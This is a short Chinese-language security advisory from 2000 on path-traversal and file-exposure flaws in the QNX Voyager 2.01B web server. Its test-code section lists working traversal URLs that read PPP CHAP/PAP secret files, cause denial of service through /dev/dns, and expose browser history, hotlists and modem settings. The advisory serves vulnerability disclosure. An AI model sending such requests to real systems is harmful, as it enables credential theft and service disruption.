QNX Voyager多个WEB服务程序漏洞发布时间:2000-05-17 更新时间:2000-05-17 严重程度:中 威胁程度:远程非授权文件存取 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 QSSL QNX 2.01B Voyager详细描述 QNX Voyager 存在几个漏洞,第一,Voyager可以通过..来绕过限制来显示。采用 ../的形式可以允许Voyager服务"document root"之外的页面。另一个漏洞就是对WEB服务程序做很好的权限限制,这就是说WEB服务程序可以访问任意文件。包括保护的和/dev下的文件。 另外,由于WEB浏览器和WEB服务器的集成,信息可以通过PHOTON GUI在/.photon/ 请求文件而被暴露。 测试代码 拒绝服务攻击: http://target/../../dev/dns PPP密码: http://target/../../etc/ppp/chap-secrets http://target/../../etc/ppp/pap-secrets [Revealing] URLS include... http://target/.photon/voyager/config.full The web client"s settings file http://target/.photon/voyager/history.html Recently visited sites http://target/.photon/voyager/hotlist The list of book-marked sites http://target/.photon/pwm/pwm.menu The Photon Window Manager menu listing (Equivalent to MS Windows" "start menu") http://target/.photon/phdial/connection [Modem build only] Modem set-up information. http://target/../../etc/config/trap/crt.cur.1 Current screen setting 解决方案 尚无 相关信息 |
